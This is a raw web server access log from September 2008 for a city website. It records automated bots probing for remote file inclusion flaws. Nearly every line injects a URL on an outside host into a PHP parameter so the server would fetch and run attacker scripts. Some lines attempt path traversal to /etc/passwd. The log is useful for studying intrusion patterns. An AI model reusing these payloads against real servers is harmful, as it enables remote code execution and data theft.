164.41.101.38 - - [01/Sep/2008:07:54:05 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.226.77.5 - - [01/Sep/2008:07:54:09 -0700] "GET /logs/access_080701.log///bemarket/postscript/postscript.php?p_mode=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:00:46 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:00:46 -0700] "GET //config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:00:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:00:48 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:08:01:58 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:08:01:58 -0700] "GET //config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:01:58 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:08:01:58 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:08:02:27 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:02:54 -0700] "GET /logs/access.log/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:02:54 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:02:54 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:02:59 -0700] "GET /logs/access_080329.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:03:00 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:03:00 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:08:03:34 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:08:03:34 -0700] "GET //config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:08:03:34 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:08:03:53 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:04:04 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:09:15 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:09:15 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:08:09:15 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:08:10:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:08:10:17 -0700] "GET //config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:08:10:17 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:10:28 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:10:28 -0700] "GET /lostpasswd.php?env[include_prefix]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:10:28 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
147.202.44.247 - - [01/Sep/2008:08:10:39 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:11:19 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:11:19 -0700] "GET //config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:11:19 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.150.189.10 - - [01/Sep/2008:08:11:22 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.viniciu-s.net/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:08:11:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:12:13 -0700] "GET /logs/access.log/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:12:14 -0700] "GET /errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:08:12:14 -0700] "GET /logs/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:12:33 -0700] "GET /logs/access_080531.log//constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:12:33 -0700] "GET /logs//constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:13:01 -0700] "GET /logs/access_080601.log//constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:08:14:02 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.62.196.11 - - [01/Sep/2008:08:19:37 -0700] "GET /logs/access_080329.log/index.php?product=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
69.62.196.11 - - [01/Sep/2008:08:19:37 -0700] "GET /index.php?product=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
69.62.196.11 - - [01/Sep/2008:08:19:38 -0700] "GET /logs/index.php?product=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:19:45 -0700] "GET /logs/access.log/modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:19:45 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:19:45 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
59.105.179.108 - - [01/Sep/2008:08:20:19 -0700] "GET /logs/access_080201.log/index.php?pg=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.105.179.108 - - [01/Sep/2008:08:20:19 -0700] "GET /index.php?pg=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.105.179.108 - - [01/Sep/2008:08:20:20 -0700] "GET /logs/index.php?pg=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:20:27 -0700] "GET /logs/access_080201.log/skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:20:27 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:20:46 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:20:59 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:08:21:04 -0700] "GET /logs/access_080330.log/modules/TotalCalendar/about.php?inc_dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:08:22:22 -0700] "GET /logs/access_080329.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:08:22:22 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:08:22:22 -0700] "GET /logs/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:22:54 -0700] "GET /logs/access_080329.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:22:55 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:22:55 -0700] "GET /logs/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:08:24:57 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:08:24:57 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:08:24:57 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:16 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:17 -0700] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.29.68.220 - - [01/Sep/2008:08:25:17 -0700] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:08:25:57 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:08:25:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:08:26:07 -0700] "GET /logs/access_080330.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:08:27:12 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:08:27:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
209.51.141.74 - - [01/Sep/2008:08:29:36 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.51.141.74 - - [01/Sep/2008:08:29:36 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.51.141.74 - - [01/Sep/2008:08:29:37 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.51.141.74 - - [01/Sep/2008:08:29:38 -0700] "GET /logs/access_080401.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:30:07 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:30:08 -0700] "GET //skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:30:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:30:59 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
74.53.231.2 - - [01/Sep/2008:08:30:59 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:08:31:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:08:31:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:31:55 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:08:32:39 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:32:41 -0700] "GET /logs/access_080330.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
217.75.193.70 - - [01/Sep/2008:08:32:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.75.193.70 - - [01/Sep/2008:08:32:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.124.127.40 - - [01/Sep/2008:08:35:03 -0700] "GET /logs/access.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:36:50 -0700] "GET /logs/access_080329.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:36:51 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:37:55 -0700] "GET /logs/access_080401.log//?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:37:55 -0700] "GET //?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:38:00 -0700] "GET /logs//?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
72.29.84.65 - - [01/Sep/2008:08:38:52 -0700] "GET /logs/access_080330.log HTTP/1.1" 206 67585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:08:39:25 -0700] "GET /logs/access_080330.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:08:40:02 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:40:18 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:08:42:39 -0700] "GET /index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:08:42:39 -0700] "GET /logs/index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
64.22.89.194 - - [01/Sep/2008:08:43:11 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:44:18 -0700] "GET /logs/access_080401.log//?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:44:23 -0700] "GET //?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 200 917 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:08:44:59 -0700] "GET /logs/access.log HTTP/1.0" 200 448020 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:08:45:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
194.60.207.171 - - [01/Sep/2008:08:45:04 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kuiwa.at/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "cityofarkadelphia.com"
66.135.38.88 - - [01/Sep/2008:08:46:26 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
